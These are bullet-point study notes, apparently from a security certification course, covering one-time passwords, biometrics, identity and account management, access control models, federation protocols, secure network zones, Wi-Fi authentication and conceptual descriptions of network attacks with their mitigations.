○ An algorithm that generates a one-time password using a hash-based
authentication code to verify the authenticity of the message.
○ The authentication server and client token are configured with the same
shared secret.
■ This should be an 8-byte value generated by a cryptographically
strong random number generator.
○ The shared secret can be transmitted to the smartphone app as a QR
code image acquirable by the phone's camera so that the user doesn't
have to type anything.
● Time-Based One-Time Password Algorithm (TOTP):
 ○ An improvement on HOTP that forces one-time passwords to expire after
a short period of time.
○ In TOTP, the HMAC is built from the shared secret plus a value derived
from the device's and server's local timestamps.
○ TOTP automatically expires each token after a short window (60 seconds,
for instance).
■ For this to work, the client device and server must be closely time-
synchronized.
2-Step Verification
● 2-step verification or out-of-band mechanisms generate a software token on a
server and send it to a resource assumed to be safely controlled by the user.
● The token can be transmitted to the device in a number of ways:
○ Short Message Service (SMS)—the code is sent as a text to the
registered phone number.
○ Phone call—the code is delivered as an automated voice call to the
registered phone number.
○ Push notification—the code is sent to a registered authenticator app on
the PC or smartphone.
○ Email—the code is sent to a registered email account.

Biometric Authentication
● The first step in setting up biometric authentication is enrollment.
● The chosen biometric information is scanned by a biometric reader and
converted to binary information.
● The biometric template is kept in the authentication server's database.
○ When the user wants to access a resource, he or she is re-scanned, and
the scan is compared to the template.
○ If they match to within a defined degree of tolerance, access is granted.
● Key metrics and considerations used to evaluate the efficacy rate of biometric
pattern acquisition and matching and suitability as an authentication mechanism
include the following:
 ○ False Rejection Rate (FRR)—where a legitimate user is not recognized.
○ False Acceptance Rate (FAR)—where an interloper is accepted (Type II
error or false match rate [FMR]). FAR is measured as a percentage.
○ False rejection cause inconvenience to users, but false acceptance can
lead to security breaches, and so is usually considered the most important
metric.
○ Crossover Error Rate (CER)—the point at which FRR and FAR meet.
The lower the CER, the more efficient and reliable the technology.
○ Throughput (speed)—the time required to create a template for each user
and the time required to authenticate.

Fingerprint Recognition
● A fingerprint sensor is usually implemented as a small capacitive cell that can
detect the unique pattern of ridges making up the pattern.
● The main problem with fingerprint scanners is that it is possible to obtain a
copy of a user's fingerprint and create a mold of it that will fool the scanner.
○ These concerns are addressed by vein matching scanners, or vascular
biometrics.

Facial Recognition
● Facial recognition records multiple indicators about the size and shape of the
face, like the distance between each eye, or the width and length of the nose.
● Facial recognition suffers from relatively high false acceptance and rejection
rates and can be vulnerable to spoofing.

Behavioral Technologies
● The variations in motion, pressure, or gait are supposed to uniquely verify each
individual.
● In practice, however, these methods are subject to higher error rates, and are
much more troublesome for a subject to perform.
 ● Voice recognition—relatively cheap, as the hardware and software required are
built into many standard PCs and mobiles.
● Gait analysis—produces a template from human movement (locomotion).
● Signature recognition—signatures are relatively easy to duplicate, but it is more
difficult to fake the actual signing process.
● Typing—matches the speed and pattern of a user’s input of a passphrase.

Lesson 8: Implementing Identity and Account Management Controls

Identity Management Controls

● Certificates and Smart Cards:
○ Public key infrastructure (PKI) allows the management of digital identities,
where a certificate authority (CA) issues certificates to validated subjects
(users and servers).
○ The subject's public key is part of a pair with a linked private key.
● Tokens:
○ In a single sign-on system, the user authenticates to an identity provider
(IdP) and receives a cryptographic token.
○ The user can present that token to compatible applications as proof they
are authenticated, and receive authorizations from the application.
● Identity Providers:
○ The identity provider is the service that provisions the user account and
processes authentication requests.

Background Check and Onboarding Policies

● Personnel management policies are applied in three phases:
○ Recruitment (hiring)—locating and selecting people to work in particular
job roles. Security issues here include screening candidates and
performing background checks.
○ Operation (working)—it is often the HR department that manages the
communication of policy and training to employees (though there may be
 a separate training and personal development department within larger
organizations).
○ Termination or separation (firing or retiring)—whether an employee leaves
voluntarily or involuntarily, termination is a difficult process, with numerous
security implications.
● Onboarding:
○ Onboarding at the HR level is the process of welcoming a new employee
to the organization.
○ Secure transmission of credentials—creating and sending an initial
password or issuing a smart card securely.
○ Asset allocation—provision computers or mobile devices for the user or
agree to the use of bring-your-own-device handsets.
○ Training/policies—schedule appropriate security awareness and role-
relevant training and certification.
● Non Disclosure Agreement (NDA):
○ An agreement that stipulates that entities will not share confidential
information, knowledge, or materials with unauthorized third parties.

Personnel Policies for Privilege Management

● Separation of Duties:
○ A concept that states that duties and responsibilities should be divided
among individuals to prevent ethical conflicts or abuse of powers.
● Least Privilege:
○ means that a user is granted sufficient rights to perform his or her job and
no more.
● Job Rotation:
○ (or rotation of duties) means that no one person is permitted to remain in
the same job for an extended period.
● Mandatory Vacation:
○ means that employees are forced to take their vacation time, during which
someone else fulfills their duties.
 ○ During that time, the corporate audit and security employees have time to
investigate and discover any discrepancies in employee activity.

Offboarding Policies
● The process of ensuring that all HR and other requirements are covered when an
employee leaves an organization.
● Account management—disable the user account and privileges.
● Company assets—retrieve mobile devices, keys, smart cards, USB media, and
so on.
● Personal assets—wipe employee-owned devices of corporate data and
applications.

Security Account Types and Credential Management

● Credential Management Policies for Personnel:
○ Improper credential management continues to be one of the most fruitful
vectors for network attacks.
○ a credential management policy should instruct users on how to keep their
authentication method secure, whether this be a password, smart card, or
biometric ID.
● Guest Accounts:
○ A guest account is a special type of shared account with no password. It
allows anonymous and unauthenticated access to a resource.

Security Group-Based Privileges

● One approach to network privilege management is to assign privileges directly to
user accounts.
● Group Account:
○ A collection of user accounts that are useful when establishing file
permissions and user rights because when many individuals need the
same level of access, a group could be established containing all the
relevant users.
Administrator/Root Accounts
● A default account is one that is created by the operating system or application
when it is installed.
○ In Windows, this account is called Administrator; in Linux, it is called root.
● Generic Administrator Account Management:
○ Superuser accounts directly contradict the principles of least privilege and
separation of duties.
○ Ubuntu Linux follows a similar approach; the root account is configured
with no password and locked, preventing login.

Service Accounts
● A host or network account that is designed to run a background service, rather
than to log on interactively.
● System—has the most privileges of any Windows account.
○ The local system account creates the host processes that start Windows
before the user logs on.
● Local Service—has the same privileges as the standard user account. It can only
access network resources as an anonymous user.
● Network Service—has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.

Shared/Generic/Device Accounts and Credentials

● A shared account is one where passwords (or other authentication credentials)
are known to more than one person
● A shared account breaks the principle of non-repudiation and makes an accurate
audit trail difficult to establish.
● Enterprise privilege access management products provide a solution for storing
these high-risk credentials somewhere other than a spreadsheet and for auditing
elevated privileges generally.
Secure Shell Keys and Third-Party Credentials
● Secure Shell (SSH) is a widely used remote access protocol. It is very likely to be
used to manage devices and services.
● SSH uses two types of key pairs:
○ A host key pair identifies an SSH server. The server reveals the public
part when a client connects to it.
■ The client must use some means of determining the validity of this
public key. If accepted, the key pair is used to encrypt the network
connection and start a session.
○ A user key pair is a means for a client to login to an SSH server.
■ The server stores a copy of the client's public key. The client uses
the linked private key to generate an authentication request and
sends the request (not the private key) to the server. The server
can only validate this request if the correct public key is held for that
client.
● A third-party credential is one used by your company to manage a vendor service
or cloud app.
○ As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an
application programming interface (API).

Account Attributes and Access Policies

● Account Attributes:
○ A user account is defined by a unique security identifier (SID), a name,
and a credential.
○ The profile can be defined with custom identity attributes describing the
user, such as a full name, email address, contact number, department,
and so on.
● Access Policies:
 ○ Each account can be assigned permissions over files and other network
resources and access policies or privileges over the use and configuration
of network hosts.
○ Access policies determine things like the right to log on to a computer
locally or via remote desktop, install software, change the network
configuration, and so on.
○ On a Windows Active Directory network, access policies can be
configured via group policy objects (GPOs).
■ GPOs can be used to configure access rights for user/group/role
accounts.

Account Password Policy Settings

● System-enforced account policies can help to enforce credential management
principles by stipulating requirements for user-selected passwords.
○ The only restriction should be to block common passwords, such as
dictionary words, repetitive strings (like 12345678), strings found in breach
databases, and strings that repeat contextual information, such as
username or company name.

Account Restrictions
● Location-Based Policies:
○ A user or device can have a logical network location, identified by an IP
address, subnet, virtual LAN (VLAN), or organizational unit (OU).
■ For example, a user account may be prevented from logging on
locally to servers within a restricted OU.
○ The geographical location of a user or device can also be calculated using
a geolocation mechanism.
■ IP address—these can be associated with a map location to
varying degrees of accuracy based on information published by the
registrant, including name, country, region, and city.
 ■ Location Services—these are methods used by the OS to calculate
the device's geographical position.
● Location services can also triangulate to cell towers, Wi-Fi
hotspots, and Bluetooth signals where GPS is not supported.
○ Geofencing refers to accepting or rejecting access requests based on
location.
■ Geofencing can also be used for push notification to send alerts or
advice to a device when a user enters a specific area.
● Time-Based Restrictions:
○ There are three main types of time-based policies:
■ A time of day policy establishes authorized logon hours for an
account.
■ A time-based login policy establishes the maximum amount of time
an account may be logged in for.
■ An impossible travel time/risky login policy tracks the location of
login events over time.

Account Audits
● A security or audit log can be used to facilitate detection of account misuse:
○ Accounting for all actions that have been performed by users. Change and
version control systems depend on knowing when a file has been modified
and by whom.
○ Detecting intrusions or attempted intrusions. Here records of failure-type
events are likely to be more useful, though success-type events can also
be revealing if they show unusual access patterns.

Usage Audits
● Usage auditing means configuring the security log to record key indicators and
then reviewing the logs for suspicious activity.
● Microsoft has published audit policy recommendations for baseline requirements
and networks with stronger security requirements:
 ○ Account logon and management events.
○ Process creation.
○ Object access (file system/file shares).
○ Changes to audit policy.
○ Changes to system security and integrity (antivirus, host firewall, and so
on).

Account Lockout and Disablement

● If account misuse is detected or suspected, the account can be manually
disabled by setting an account property.
● This prevents the account from being used for login. Note that disabling the
account does not close existing sessions.
○ You can issue a remote logoff command to close a session.
● Setting an account expiration date means that an account cannot be used
beyond a certain date.

Discretionary and Role-Based Access Control

● An important consideration in designing a security system is to determine how
users receive rights or permissions.
● Discretionary Access Control (DAC):
○ Access control model where each resource is protected by an Access
Control List (ACL) managed by the resource's owner (or owners).
○ As the most flexible model, it is also the weakest because it makes
centralized administration of security policies the most difficult to enforce.
● Role-Based Access Control (RBAC):
○ An access control model where resources are protected by ACLs that are
managed by administrators and that provide user permissions based on
job functions.

File System Permissions

 ● With file system security, each object in the file system has an ACL associated
with it.
● Each record in the ACL is called an access control entry (ACE).
○ The order of ACEs in the ACL is important in determining effective
permissions for a given account.
● Linux, there are three basic permissions:
○ Read (r)—the ability to access and view the contents of a file or list the
contents of a directory.
○ Write (w)—the ability to save changes to a file, or create, rename, and
delete files in a directory (also requires execution).
○ Execute (x)—the ability to run a script, program, or other software file, or
the ability to access a directory, execute a file from that directory, or
perform a task on that directory, such as file search.
● The chmod command is used to modify permissions. It can be used in symbolic
mode or absolute mode.

Mandatory and Attribute-Based Access Control

● Mandatory Access Control (MAC):
○ Based on the idea of security clearance levels. Rather than defining ACLs
on resources, each object and each subject is granted a clearance level,
referred to as a label.
● Attribute-Based Access Control (ABAC):
○ An access control technique that evaluates a set of attributes that each
subject possesses to determine if access should be granted.

Rule-Based Access Control

● A term that can refer to any sort of access control model where access control
policies are determined by system-enforced rules rather than system users.
● Conditional Access:
○ A conditional access system monitors account or device behavior
throughout a session.
 ○ If certain conditions are met, the account may be suspended or the user
may be required to reauthenticate, perhaps using a 2-step verification
method.
● Privileged Access Management:
○ A privileged account is one that can make significant configuration
changes to a host, such as installing software or disabling a firewall or
other security system.
○ Privileged access management (PAM) refers to policies, procedures,
and technical controls to prevent the malicious abuse of privileged
accounts and to mitigate risks from weak configuration control over
privileges.

Directory Services
● Directory services are the principal means of providing privilege management
and authorization on an enterprise network, storing information about users,
computers, security groups/roles, and services.
● The Lightweight Directory Access Protocol (LDAP) is a protocol widely used to
query and update X.500 format directories.
○ A distinguished name (DN) is a unique identifier for any given resource
within an X.500-like directory.
○ A distinguished name is made up of attribute=value pairs, separated by
commas.
 ○

Federation and Attestation

● Federation:
○ Federation is the notion that a network needs to be accessible to more
than just a well-defined group of employees.
○ In business, a company might need to make parts of its network open to
partners, suppliers, and customers.
○ Federation means that the company trusts accounts created and
managed by a different network.
■ If Google and Twitter establish a federated network for the purpose
of authentication and authorization, then the user can log on to
Twitter using his or her Google credentials or vice versa.
● Identity Providers and Attestation:
○ In these models, the networks perform federated identity management.
 ○

Security Assertion Markup Language

● A federated network or cloud needs specific protocols and technologies to
implement user identity assertions and transmit attestations between the
principal, the relying party, and the identity provider.
● Security Assertion Markup Language (SAML):
○ An XML-based data format used to exchange authentication information
between a client and a service.
● Simple Object Access Protocol (SOAP):
○ An XML-based web services protocol that is used to exchange messages.

Oauth and OpenID Connect

● Authentication and authorization for a RESTful API is often implemented using
the Open Authorization (OAuth) protocol.
● OAuth is designed to facilitate sharing of information (resources) within a user
profile between sites.
● The user can use that account to log on to an OAuth consumer site without
giving the password to the consumer site.
 ● OpenID Connect (OIDC):
○ an authentication protocol that can be implemented as special types of
OAuth flows with precisely defined token fields.

Conduct Policies
● Acceptable Use Policy:
○ A policy that governs employees' use of company equipment and Internet
services. ISPs may also apply AUPs to their customers.
○ The policy will forbid the use of equipment to defraud, to defame, or to
obtain illegal material.
● Code of Conduct and Social Media Analysis:
○ A code of conduct, or rules of behavior, sets out expected professional
standards.
■ For example, employees' use of social media and file sharing poses
substantial risks to the organization, including threat of virus
infection or systems intrusion, lost work time, copyright
infringement, and defamation.

Diversity of Training Techniques

● Capture the Flag:
○ Training event where learners must identify a token within a live network
environment.

Lesson 9: Implementing Secure Network Designs

Secure Network Designs

● Typical weaknesses include:
○ Single points of failure—a "pinch point" relying on a single hardware
server or appliance or network channel.
○ Complex dependencies—services that require many different systems to
be available.
 ○ Availability over confidentiality and integrity—often it is tempting to take
"shortcuts" to get a service up and running.
○ Lack of documentation and change control—network segments,
appliances, and services might be added without proper change control
procedures, leading to a lack of visibility into how the network is
constituted.
○ Overdependence on perimeter security—if the network architecture is
"flat" (that is, if any host can contact any other host), penetrating the
network edge gives the attacker freedom of movement.

Business Workflows and Network Architecture

● Network architecture is designed to support business workflows.
● You can illustrate the sorts of decisions that need to be made by analyzing a
simple workflow, such as email:
○ Access—the client device must access the network, obtaining a physical
channel and logical address.
■ The user must be authenticated and authorized to use the email
application.
○ Email mailbox server—ensure that the mailbox is only accessed by
authorized clients and that it is fully available and fault tolerant.
■ Ensure that the email service runs with a minimum number of
dependencies and that the service is designed to be resilient to
faults.
○ Mail transfer server—this must connect with untrusted Internet hosts, so
communications between the untrusted network and trusted LAN must be
carefully controlled.

Network Appliances
● A number of network appliances are involved in provisioning a network
architecture:
○ Switches—forward frames between nodes in a cabled network.
 ○ Wireless access points—provide a bridge between a cabled network and
wireless clients, or stations.
○ Routers—forward packets around an internetwork, making forwarding
decisions based on IP addresses.
■ Routers work at layer 3 of the OSI model. Routers can apply logical
IP subnet addresses to segments within a network.
○ Firewalls—apply an access control list (ACL) to filter traffic passing in or
out of a network segment.
○ Load balancers—distribute traffic between network segments or servers to
optimize performance.
○ Domain Name System (DNS) servers—host name records and perform
name resolution to allow applications and users to address hosts and
services using fully qualified domain names (FQDNs) rather than IP
addresses.

Routing and Switching Protocols

● The forwarding function takes place at two different layers:
○ Layer 2 forwarding occurs between nodes on the same local network
segment that are all in the same broadcast domain.
■ At layer 2, a broadcast domain is either all the nodes connected to
the same physical unmanaged switch, or all the nodes within a
virtual LAN (VLAN) configured on one or more managed switches.
○ Layer 3 forwarding, or routing, occurs between both logically and
physically defined networks.
■ A single network divided into multiple logical broadcast domains is
said to be subnetted.
■ Multiple networks joined by routers form an internetwork.
● Address Resolution Protocol (ARP):
○ The Address Resolution Protocol (ARP) maps a network interface's
hardware (MAC) address to an IP address.
● Routing Protocols:
 ○ Information about how to reach individual networks within an internetwork
is processed by routers, which store the data in a routing table.

Network Segmentation
● A network segment is one where all the hosts attached to the segment can use
local (layer 2) forwarding to communicate freely with one another.
● Segregation means that the hosts in one segment are restricted in the way they
communicate with hosts in other segments.

Network Topology and Zones

● The main building block of a security topology is the zone.
○ A zone is an area of the network where the security configuration is the
same for all hosts within it.
○ Zones should be segregated from one another by physical and/or logical
segmentation, using VLANs and subnets.
● Intranet (private network)—this is a network of trusted hosts owned and
controlled by the organization.
● Extranet—this is a network of semi-trusted hosts, typically representing business
partners, suppliers, or customers
○ Hosts must authenticate to join the extranet.
● Internet/guest—this is a zone permitting anonymous access (or perhaps a mix of
anonymous and authenticated access) by untrusted hosts over the Internet.

Demilitarized Zones
● The most important distinction between different security zones is whether a host
is Internet-facing.
● Demilitarized Zones:
○ A segment isolated from the rest of a private network by one or more
firewalls that accepts connections from the Internet over designated ports.
○ The basic principle of a DMZ is that traffic cannot pass directly through it.
 ● A DMZ enables external clients to access data on private systems, such as web
servers, without compromising the security of the internal network as a whole.
● The hosts in a DMZ are not fully trusted by the internal network because of the
possibility that they could be compromised from the Internet.
○ They are referred to as bastion hosts and run minimal services to reduce
the attack surface as much as possible.

Demilitarized Zone Topologies

● To configure a DMZ, two different security configurations must be enabled: one
on the external interface and one on the internal interface.
● A DMZ and intranet are on different subnets, so communications between them
need to be routed.
● Screened Subnet:
○ A screened subnet uses two firewalls placed on either side of the DMZ.
○ The edge firewall restricts traffic on the external/public interface and
allows permitted traffic to the hosts in the DMZ.
■ The edge firewall can be referred to as the screening firewall or
router.
○ The internal firewall filters communications between hosts in the DMZ and
hosts on the LAN.
■ This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access
control and easier monitoring.
 ○
● Triple-Homed Firewall:
○ A DMZ can also be established using one router/firewall appliance with
three network interfaces, referred to as triple-homed.
○ One interface is the public one, another is the DMZ, and the third connects
to the LAN.
○ Routing and filtering rules determine what forwarding is allowed between
these interfaces.

○
Screened Hosts
● Smaller networks may not have the budget or technical expertise to implement a
DMZ.
● In this case, Internet access can still be implemented using a dual-homed
proxy/gateway server acting as a screened host.
○ Screened Host: A dual-homed proxy/gateway server used to provide
Internet access to other network nodes, while protecting them from
external attack.

Implications of IPv6
● If IPv6 is enabled but unmanaged, there is the potential for malicious use as a
backdoor or covert channel.
● Firewalls should be configured with ACLs that either achieve the same security
configuration as for IPv4 or block IPv6, if that is a better option.

Other Secure Network Design Considerations

● East-West Traffic:
○ In data centers that support cloud and other Internet services, most traffic
is actually between servers within the data center.
○ This is referred to as east-west traffic.
● Zero trust architectures assume that nothing should be taken for granted and
that all network access must be continuously verified and authorized.
○ A Zero Trust architecture can protect data, applications, networks, and
systems from malicious attacks and unauthorized access more effectively
 than a traditional architecture by ensuring that only necessary services are
allowed and only from appropriate sources.

Man-In-The-Middle and Layer 2 Attacks

● Attacks at the physical and data link layers, referred to in the OSI model as layer
1 and layer 2, are often focused on information gathering—network mapping
and eavesdropping on network traffic.
● Man-in-the-Middle/On-Path Attacks:
○ A MitM or on-path attack is where the threat actor gains a position
between two hosts, and transparently captures, monitors, and relays all
communication between the hosts.
● MAC Cloning:
○ MAC cloning, or MAC address spoofing, changes the hardware address
configured on an adapter interface or asserts the use of an arbitrary MAC
address.
○ While a unique MAC address is assigned to each network interface by the
vendor at the factory, it is simple to override it in software via OS
commands, alterations to the network driver configuration, or using packet
crafting software.

ARP Poisoning and MAC Flooding Attacks

● A host uses the Address Resolution Protocol (ARP) to discover other hosts on
the local segment that owns an IP address.
● ARP Poisoning Attacks:
○ An ARP poisoning attack uses a packet crafter, such as Ettercap, to
broadcast unsolicited ARP reply packets.
○ Because ARP has no security mechanism, the receiving devices trust this
communication and update their MAC:IP address cache table with the
spoofed address.
○ The usual target will be the subnet's default gateway (the router that
accesses other networks).
 ○ If the ARP poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker.
● MAC Flooding Attacks:
○ MAC flooding is used to attack a switch.
○ The intention of the attacker is to exhaust the memory used to store the
switch's MAC address table.

Loop Prevention
● As a layer 2 protocol, Ethernet has no concept of Time To Live.
● Therefore, layer 2 broadcast traffic could continue to loop through a network with
multiple paths indefinitely.
● Layer 2 loops are prevented by the Spanning Tree Protocol (STP).
○ Spanning tree is a means for the bridges to organize themselves into a
hierarchy and prevent loops from forming.
● Broadcast Storm Prevention:
○ STP is principally designed to prevent broadcast storms.
○ If a bridged network contains a loop, broadcast traffic will travel through
the network, get amplified by the other switches, and arrive back at the
original switch, which will re-broadcast each incoming broadcast frame,
causing an exponential increase (the storm), which will rapidly overwhelm
the switches and crash the network.
○ A storm control setting on a switch is a backup mechanism to rate-limit
broadcast traffic above a certain threshold.
● Bridge Protocol Data Unit (BPDU) Guard:
○ A threat actor might try to attack STP using a rogue switch or software
designed to imitate a switch.
○ BPDU Guard is a switch port security feature that can disable a port if it
receives a BPDU from a connected device.
○ Topology changes in STP can cause a switch to flush the cache more
frequently and to start flooding unicast traffic more frequently, which can
 have a serious impact on network performance and assists sniffing
attacks.

Physical Port Security and MAC Filtering

● Port Security: Preventing a device attached to a switch port from communicating
on the network unless it matches a given MAC address or other protection
profile.
● MAC Filtering and MAC Limiting:
○ Configuring MAC filtering on a switch means defining which MAC
addresses are allowed to connect to a particular port.
○ This can be done by creating a list of valid MAC addresses or by
specifying a limit to the number of permitted addresses.
● DHCP Snooping:
○ A configuration option that enables a switch to inspect DHCP traffic to
prevent MAC spoofing.
○ DHCP snooping inspects this traffic arriving on access ports to ensure that
a host is not trying to spoof its MAC address.

Network Access Control

● The IEEE 802.1X standard defines a port-based network access control
(PNAC) mechanism.
○ PNAC means that the switch uses an Authentication, Authorization, and
Accounting (AAA) server to authenticate the attached device before
activating the port.
● Network access control (NAC) products can extend the scope of authentication
to allow administrators to devise policies or profiles describing a minimum
security configuration that devices must meet to be granted network access.
○ This is called a health policy.
● Posture assessment is the process by which host health checks are performed
against a client device to verify compliance with the health policy.
Route Security
● A successful attack against route security enables the attacker to redirect traffic
from its intended destination.
● Routing is subject to numerous vulnerabilities, including:
○ Spoofed routing information (route injection)—Routing protocols that have
no or weak authentication are vulnerable to route table poisoning.
■ This can mean that traffic is misdirected to a monitoring port
(sniffing), sent to a blackhole (nonexistent address), or continuously
looped around the network, causing DoS.
○ Source routing—This uses an option in the IP header to pre-determine the
route a packet will take through the network (strict) or "waypoints" that it
must pass through (loose).
○ Software exploits in the underlying operating system—Hardware routers
(and switches) have an embedded operating system.

Wireless Network Installation Considerations

● Wireless network installation considerations refer to the factors that ensure good
availability of authorized Wi-Fi access points.
● WAP Placement:
○ The access points forward traffic to and from the wired switched network.
○ Each WAP is identified by its MAC address, also referred to as its basic
service set identifier (BSSID).

Controller and Access Point Security

● Wireless Controllers: A device that provides wireless LAN management for
multiple APs.
● An access point whose firmware contains enough processing logic to be able to
function autonomously and handle clients without the use of a wireless controller
is known as a fat WAP.
● one that requires a wireless controller in order to function is known as a thin
WAP.
Wi-Fi Protected Access
● WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys,
deployed within the Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP).
● Weaknesses have also been found in WPA2, however, which has led to its
intended replacement by WPA3.
● The main features of WPA3 are as follows:
○ Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way
handshake authentication and association mechanism with a protocol
based on Diffie-Hellman key agreement.
○ Enhanced Open—enables encryption for the open authentication method.
○ Updated cryptographic protocols—replaces AES CCMP with the AES
Galois Counter Mode Protocol (GCMP) mode of operation.
○ Management protection frames—mandates use of these to protect against
key recovery attacks.

Wi-Fi Authentication Methods

● WPA2 Pre-Shared Key Authentication:
○ In WPA2, pre-shared key (PSK) authentication uses a passphrase to
generate the key that is used to encrypt communications
○ The administrator configures a passphrase of between 8 and 63 ASCII
characters.
■ This is converted to a 256-bit HMAC (expressed as a 64-character
hex value) using the PBKDF2 key stretching algorithm.
● WPA3 Personal Authentication:
○ While WPA3 still uses a passphrase to authenticate stations in personal
mode, it changes the method by which this secret is used to agree upon
session keys.
○ the Simultaneous Authentication of Equals (SAE) protocol replaces the 4-
way handshake, which has been found to be vulnerable to various attacks.
 ○ SAE uses the Dragonfly handshake, which is basically Diffie-Hellman over
elliptic curves key agreement, combined with a hash value derived from
the password and device MAC address to authenticate the nodes.

Wi-Fi Protected Setup

● As setting up an access point securely is relatively complex for residential
consumers, vendors have developed a system to automate the process called
Wi-Fi Protected Setup (WPS).
● To use WPS, both the access point and wireless station (client device) must be
WPS-capable.
● Activating this on the access point and the adapter simultaneously will associate
the devices using a PIN, then associate the adapter with the access point using
WPA2.
● WPS is vulnerable to a brute force attack.
○ These separate PINs are many orders of magnitude simpler to brute force,
typically requiring just hours to crack.

Open Authentication and Captive Portals

● Selecting open authentication means that the client is not required to
authenticate.
○ This mode would be used on a public WAP (or "hotspot").
● Open authentication may be combined with a secondary authentication
mechanism managed via a browser.
○ When the client associates with the open hotspot and launches the
browser, the client is redirected to a captive portal or splash page.
○ This will allow the client to authenticate to the hotspot provider's network
(over HTTPS, so the login is secure).

Enterprise/IEEE 802.1X Authentication

 ● As an alternative to personal authentication, the enterprise authentication method
implements IEEE 802.1X to use an Extensible Authentication Protocol (EAP)
mechanism.
● 802.1X defines the use of EAP over Wireless (EAPoW) to allow an access point
to forward authentication data without allowing any other type of network access.
● It is configured by selecting WPA2-Enterprise or WPA3-Enterprise as the security
method on the access point.

Extensible Authentication Protocol

● The Extensible Authentication Protocol (EAP) defines a framework for
negotiating authentication mechanisms rather than the details of the mechanisms
themselves.
● EAP-TLS is one of the strongest types of authentication and is very widely
supported.
● An encrypted Transport Layer Security (TLS) tunnel is established between the
supplicant and authentication server using public key certificates on the
authentication server and supplicant.

PEAP, EAP-TTLS, and EAP-FAST

● Protected Extensible Authentication Protocol (PEAP):
○ EAP implementation that uses a server-side certificate to create a secure
tunnel for user authentication, referred to as the inner method.
○ The supplicant does not require a certificate.
● EAP with Tunneled TLS (EAP-TTLS):
○ An EAP method that enables a client and server to establish a secure
connection without mandating a client-side certificate.
○ The main distinction from PEAP is that EAP-TTLS can use any inner
authentication protocol (PAP or CHAP, for instance), while PEAP must
use EAP-MS-CHAPv2 or EAP-GTC.
● EAP with Flexible Authentication via Secure Tunneling (EAP-FAST):
 ○ An EAP method developed by Cisco as a replacement for LEAP. EAP-
FAST does not require a certificate authority while aiming to provide a
higher level of security.
○ Instead of using a certificate to set up the tunnel, it uses a Protected
Access Credential (PAC), which is generated for each user from the
authentication server's master key.

Radius Federation
● Most implementations of EAP use a RADIUS server to validate the authentication
credentials for each user (supplicant)
● RADIUS federation means that multiple organizations allow access to one
another's users by joining their RADIUS servers into a RADIUS hierarchy or
mesh.

Rogue Access Points and Evil Twins

● A rogue access point is one that has been installed on the network without
authorization, whether with malicious intent or not
○ A malicious user can set up such an access point with something as basic
as a smartphone with tethering capabilities, and a non-malicious user
could enable such an access point by accident.
○ If connected to a LAN without security, an unauthorized WAP creates a
backdoor through which to attack the network.
● An evil twin might just have a similar name (SSID) to the legitimate one, or the
attacker might use some DoS technique to overcome the legitimate WAP.
● A rogue hardware WAP can be identified through physical inspections. There are
also various Wi-Fi analyzers and monitoring systems that can detect rogue
WAPs, including inSSIDer.

Dissociation and Replay Attacks

 ● The access point normally broadcasts a beacon frame to advertise service
capabilities. Clients can choose to first authenticate and then associate to an
access point when they move into range of the beacon.
● The client or access point can use disassociation and/or deauthentication
frames to notify the other party that it has ended a connection.
○ A disassociation frame is sent in order to terminate the association from
either side in an access point.
○ A deauthentication frame is used to completely end a connection with a
Wi-Fi network.
● A disassociation attack exploits the lack of encryption in management frame
traffic to send spoofed frames.
○ One type of disassociation attack injects management frames that spoof
the MAC address of a single victim station in a disassociation notification,
causing it to be disconnected from the network.
○ Another variant of the attack broadcasts spoofed frames to disconnect all
stations.
● Disassociation/deauthentication attacks may be used to perform a denial of
service attack against the wireless infrastructure or to exploit disconnected
stations to try to force reconnection to a rogue WAP.
● The attacks can be mitigated if the wireless infrastructure supports Management
Frame Protection (MFP/802.11w).

Jamming Attacks
● A Wi-Fi jamming attack can be performed by setting up a WAP with a stronger
signal.
○ An attack in which radio waves disrupt 802.11 wireless signals.
● The only ways to defeat a jamming attack are either to locate the offending radio
source and disable it, or to boost the signal from the legitimate equipment.
○ The source of interference can be detected using a spectrum analyzer.
Distributed Denial of Service Attacks
● Most denial of service (DoS) attacks against websites and gateways are
distributed DoS (DDoS).
● Some types of DDoS attacks simply aim to consume network bandwidth, denying
it to legitimate hosts, by using overwhelming numbers of bots.
● For example, a SYN flood attack works by withholding the client's ACK packet
during TCP's three-way handshake.
○ A DoS attack where the attacker sends numerous SYN requests to a
target server, hoping to consume enough resources to prevent the transfer
of legitimate traffic.

Amplification, Application, and OT Attacks

● Application Attacks:
○ An application attack targets vulnerabilities in the headers and payloads of
specific application protocols.
● Amplification Attack:
○ A network-based attack where the attacker dramatically increases the
bandwidth sent to a victim during a DDoS attack by implementing an
amplification factor.
● Operational Technology (OT) Attacks:
○ The term "operational" is used because these systems monitor and control
physical electromechanical components, such as valves, motors, electrical
switches, gauges, and sensors.
○ The limited resources of these devices mean that DDoS can rapidly
overwhelm available memory or CPU time.

Distributed Denial of Service Attack Mitigation

● DDoS attacks can be diagnosed by traffic spikes that have no legitimate
explanation, but can usually only be counteracted by providing high availability
services, such as load balancing and cluster services.
 ● When a network is faced with a DDoS or similar flooding attack, an ISP can use
either an access control list (ACL) or a blackhole to drop packets for the affected
IP address(es).
○ A blackhole is an area of the network that cannot reach any other part of
the network.
○ Remotely Triggered Black Hole (RTBH):
■ Using a trigger device to send a BGP route update that instructs
routers to drop traffic that is suspected of attempting DDoS.
● Sinkhole routing so that the traffic flooding a particular IP address is routed to a
different network where it can be analyzed.

Load Balancing
● A load balancer distributes client requests across available server nodes in a
farm or pool.
● A load balancer also provides fault tolerance.
○ If there are multiple servers available in a farm, all addressed by a single
name/IP address via a load balancer, then if a single server fails, client
requests can be routed to another server in the farm.
● There are two main types of load balancers:
○ Layer 4 load balancer—basic load balancers make forwarding decisions
on IP address and TCP/UDP port values, working at the transport layer of
the OSI model.
○ Layer 7 load balancer (content switch)—as web applications have become
more complex, modern load balancers need to be able to make forwarding
decisions based on application-level data, such as a request for a
particular URL or data types like video or audio streaming.
● Scheduling:
○ The scheduling algorithm is the code and metrics that determine which
node is selected for processing each incoming request.
○ The simplest type of scheduling is called round robin; this just means
picking the next node.
 ○ The load balancer must also use some type of heartbeat or health check
probe to verify whether each node is available and under load or not.
● Source IP Affinity and Session Persistence:
